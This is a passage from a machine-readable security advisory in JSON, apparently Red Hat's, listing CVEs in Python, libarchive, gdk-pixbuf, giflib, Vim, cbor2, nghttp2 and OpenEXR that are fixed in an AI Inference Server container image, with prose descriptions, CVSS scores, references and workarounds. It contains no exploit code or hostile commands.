"url": "https://mail.python.org/archives/list/security-announce@python.org/thread/AY5NDSS433JK56Q7Q5IS7B37QFZVVOUS/"
}
],
"release_date": "2026-03-20T15:08:32.576000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python: Python: Command-line option injection in webbrowser.open() via crafted URLs"
},
{
"acknowledgments": [
{
"names": [
"Elhanan Haenel"
]
}
],
"cve": "CVE-2026-5121",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-30T07:40:25.358335+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2452945"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libarchive: libarchive: Arbitrary code execution via integer overflow in ISO9660 image processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: An integer overflow flaw in `libarchive` on 32-bit systems can lead to a heap buffer overflow. This vulnerability occurs when processing a specially crafted ISO9660 image, allowing an attacker to potentially execute arbitrary code. Red Hat Enterprise Linux 64-bit systems are not affected by this flaw.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-5121"
},
{
"category": "external",
"summary": "RHBZ#2452945",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452945"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-5121",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-5121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-5121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5121"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-2vwv-vqpv-v8vc",
"url": "https://github.com/advisories/GHSA-2vwv-vqpv-v8vc"
},
{
"category": "external",
"summary": "https://github.com/libarchive/libarchive/pull/2934",
"url": "https://github.com/libarchive/libarchive/pull/2934"
}
],
"release_date": "2026-03-30T07:44:15.222000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "To mitigate this issue, avoid processing untrusted ISO9660 images with applications that utilize `libarchive`. Users should only extract or read content from ISO images obtained from trusted sources.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libarchive: libarchive: Arbitrary code execution via integer overflow in ISO9660 image processing"
},
{
"acknowledgments": [
{
"names": [
"Ka\u011fan \u00c7apar"
]
}
],
"cve": "CVE-2026-5201",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"discovery_date": "2026-03-31T07:17:23.696000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2453291"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of service (DoS) conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "gdk-pixbuf: gdk-pixbuf: Denial of Service via heap-based buffer overflow when processing a specially crafted JPEG image",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "An Important heap-based buffer overflow flaw exists in the `gdk-pixbuf` library\u0027s JPEG image loader. This vulnerability can be triggered automatically without user interaction when processing a specially crafted JPEG image, such as during thumbnail generation. Successful exploitation leads to application crashes and denial-of-service conditions in applications utilizing `gdk-pixbuf` for image handling.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-5201"
},
{
"category": "external",
"summary": "RHBZ#2453291",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453291"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-5201",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-5201"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-5201",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5201"
},
{
"category": "external",
"summary": "https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/304",
"url": "https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/304"
}
],
"release_date": "2026-03-31T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "To reduce the risk of exploitation, avoid opening or processing untrusted JPEG image files. This operational control helps prevent the automatic triggering of the vulnerability, for example, during thumbnail generation, which could otherwise lead to application instability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "gdk-pixbuf: gdk-pixbuf: Denial of Service via heap-based buffer overflow when processing a specially crafted JPEG image"
},
{
"cve": "CVE-2026-23868",
"cwe": {
"id": "CWE-825",
"name": "Expired Pointer Dereference"
},
"discovery_date": "2026-03-10T20:01:10.215637+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2446207"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in giflib. This double-free vulnerability, caused by a shallow copy in GifMakeSavedImage and incorrect error handling, may allow an attacker to corrupt memory. While difficult to trigger, successful exploitation could potentially lead to arbitrary code execution or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "giflib: Giflib: Double-free vulnerability leading to memory corruption",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-23868"
},
{
"category": "external",
"summary": "RHBZ#2446207",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446207"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-23868",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23868"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-23868",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23868"
},
{
"category": "external",
"summary": "https://sourceforge.net/p/giflib/code/ci/f5b7267aed3665ef025c13823e454170d031c106/tree/gifalloc.c?diff=5146815377b7395944cb683a08c43eee3f631eb7",
"url": "https://sourceforge.net/p/giflib/code/ci/f5b7267aed3665ef025c13823e454170d031c106/tree/gifalloc.c?diff=5146815377b7395944cb683a08c43eee3f631eb7"
},
{
"category": "external",
"summary": "https://www.facebook.com/security/advisories/cve-2026-23868",
"url": "https://www.facebook.com/security/advisories/cve-2026-23868"
}
],
"release_date": "2026-03-10T18:53:25.606000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "giflib: Giflib: Double-free vulnerability leading to memory corruption"
},
{
"cve": "CVE-2026-25749",
"cwe": {
"id": "CWE-120",
"name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
},
"discovery_date": "2026-02-09T11:08:59.061581+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437843"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim, an open source, command line text editor. This heap buffer overflow vulnerability exists in the tag file resolution logic when processing the \u0027helpfile\u0027 option. A local user could exploit this by providing a specially crafted \u0027helpfile\u0027 option value, leading to a heap buffer overflow. This could result in arbitrary code execution or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Arbitrary code execution via \u0027helpfile\u0027 option processing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This MODERATE impact vulnerability in Vim\u0027s tag file resolution logic allows a local attacker to achieve a out-of-bounds write. By providing a specially crafted `helpfile` option value a local user can trigger a heap buffer overflow, as consequence lead to memory corruption presenting a data integrity impact or leading the vim process to crash resulting in availability impact. Although being non-trivial and very complex, arbitrary code execution is not discarded as worst case scenario.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25749"
},
{
"category": "external",
"summary": "RHBZ#2437843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437843"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25749",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25749"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25749",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25749"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/commit/0714b15940b245108e6e9d7aa2260dd849a26fa9",
"url": "https://github.com/vim/vim/commit/0714b15940b245108e6e9d7aa2260dd849a26fa9"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.1.2132",
"url": "https://github.com/vim/vim/releases/tag/v9.1.2132"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-5w93-4g67-mm43",
"url": "https://github.com/vim/vim/security/advisories/GHSA-5w93-4g67-mm43"
}
],
"release_date": "2026-02-06T22:43:38.630000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vim: Vim: Arbitrary code execution via \u0027helpfile\u0027 option processing"
},
{
"cve": "CVE-2026-26209",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-03-23T19:02:13.009646+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2450422"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in cbor2, a library for encoding and decoding Concise Binary Object Representation (CBOR) data. A remote attacker can exploit this vulnerability by sending a specially crafted CBOR payload containing deeply nested structures. This can cause the application to crash due to uncontrolled recursion, leading to a complete Denial of Service (DoS) for the affected application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cbor2: cbor2: Denial of Service due to uncontrolled recursion via crafted CBOR payloads",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26209"
},
{
"category": "external",
"summary": "RHBZ#2450422",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450422"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26209",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26209"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26209",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26209"
},
{
"category": "external",
"summary": "https://github.com/agronholm/cbor2/commit/e61a5f365ba610d5907a0ae1bc72769bba34294b",
"url": "https://github.com/agronholm/cbor2/commit/e61a5f365ba610d5907a0ae1bc72769bba34294b"
},
{
"category": "external",
"summary": "https://github.com/agronholm/cbor2/pull/275",
"url": "https://github.com/agronholm/cbor2/pull/275"
},
{
"category": "external",
"summary": "https://github.com/agronholm/cbor2/releases/tag/5.9.0",
"url": "https://github.com/agronholm/cbor2/releases/tag/5.9.0"
},
{
"category": "external",
"summary": "https://github.com/agronholm/cbor2/security/advisories/GHSA-3c37-wwvx-h642",
"url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-3c37-wwvx-h642"
}
],
"release_date": "2026-03-23T18:53:10.268000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "cbor2: cbor2: Denial of Service due to uncontrolled recursion via crafted CBOR payloads"
},
{
"cve": "CVE-2026-27135",
"cwe": {
"id": "CWE-617",
"name": "Reachable Assertion"
},
"discovery_date": "2026-03-18T19:02:13.823002+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2448754"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in nghttp2. Due to missing internal state validation, the library continues to process incoming data even after a session has been terminated. A remote attacker could exploit this by sending a specially crafted HTTP/2 frame, leading to an assertion failure and a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nghttp2: nghttp2: Denial of Service via malformed HTTP/2 frames after session termination",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27135"
},
{
"category": "external",
"summary": "RHBZ#2448754",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448754"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27135",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27135"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27135",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27135"
},
{
"category": "external",
"summary": "https://github.com/nghttp2/nghttp2/commit/5c7df8fa815ac1004d9ecb9d1f7595c4d37f46e1",
"url": "https://github.com/nghttp2/nghttp2/commit/5c7df8fa815ac1004d9ecb9d1f7595c4d37f46e1"
},
{
"category": "external",
"summary": "https://github.com/nghttp2/nghttp2/security/advisories/GHSA-6933-cjhr-5qg6",
"url": "https://github.com/nghttp2/nghttp2/security/advisories/GHSA-6933-cjhr-5qg6"
}
],
"release_date": "2026-03-18T17:59:02.045000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "nghttp2: nghttp2: Denial of Service via malformed HTTP/2 frames after session termination"
},
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:14:38+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16009",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16009"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
},
{
"cve": "CVE-2026-28417",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2026-02-27T22:01:53.728412+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443455"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Vim, an open-source command-line text editor. Specifically, an operating system (OS) command injection vulnerability exists in the `netrw` standard plugin. A remote attacker could exploit this by tricking a user into opening a specially crafted URL, such as one using the `scp://` protocol handler. Successful exploitation allows the attacker to execute arbitrary shell commands with the same privileges as the Vim process, leading to potential system compromise.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vim: Vim: Arbitrary code execution via OS command injection in the netrw plugin",
"title": "Vulnerability summary"
},
{
"category": "other",
